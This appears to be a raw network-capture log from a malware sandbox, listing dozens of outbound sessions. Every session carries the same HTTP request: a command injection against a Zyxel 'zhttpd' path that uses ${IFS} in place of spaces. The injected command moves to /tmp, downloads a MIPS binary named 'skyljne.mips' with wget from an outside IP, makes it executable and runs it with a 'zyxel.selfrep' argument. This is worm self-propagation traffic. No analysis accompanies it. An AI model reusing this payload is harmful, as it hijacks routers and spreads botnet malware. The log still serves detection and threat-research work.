                                                Jan 12, 2024 18:23:52.299232006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.1334202135.166.128.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299232960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.1357048210.0.213.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299299955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.1352868167.103.108.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299351931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.1351982188.76.43.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299355984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.1344106112.183.177.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299411058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.13437589.8.172.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299412012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.1358946128.101.118.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299415112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.13540341.2.65.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299439907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.1339726176.245.59.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299439907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.135442214.149.117.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299504995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.133385467.57.176.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299545050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.133518643.31.212.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299595118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.133705463.92.250.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299612045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.133576647.73.159.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299673080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.134249412.180.78.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299683094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.1352202173.62.5.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299683094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.135013887.27.204.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299829006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.1342762117.101.30.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299829006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.13605382.38.166.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299837112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.133873476.112.97.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299969912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.135320446.235.10.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299993992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.133334813.79.143.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300005913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.1347540204.175.28.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300009966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.1347772114.56.148.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300045967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.134352098.3.168.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300052881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.1345480141.13.95.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300052881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.1352656138.13.156.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300055981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.1350116135.187.237.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300124884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.135294638.196.19.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300199032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.134099242.201.47.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300265074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.134404448.4.157.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300276995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.135476895.88.72.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300298929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.136085462.100.253.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300302982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.13553604.26.48.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300348043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.1339954166.12.170.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300369024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.134263062.165.158.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300458908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.1357098167.74.149.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300482035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.1337580180.40.23.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300488949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.1359824125.222.17.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300626040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.135562486.172.181.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300653934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.1349368123.75.130.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300734997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.134980676.57.44.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300739050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.1339510129.113.81.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300822020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.1356358156.125.176.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300822020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.136003440.179.246.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300883055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.135639866.75.128.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300908089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.135727297.139.122.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300908089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.136029270.16.139.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300957918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.1336100196.183.77.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300981998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.1355290155.85.139.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.300983906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.133634820.84.37.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301034927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.1352708117.232.169.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301052094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.133482281.207.1.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301054955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.135806274.161.6.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301095009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.135695099.28.35.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301198959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.133934484.157.111.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301259041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.1358910219.0.238.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301307917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.134236071.59.213.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301430941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.1360596168.33.230.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301440954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.13332005.10.114.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301444054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.1354252115.91.199.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301450014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.134202632.223.115.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301451921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.134787012.110.235.152443
                                                TimestampBytes transferredDirectionData
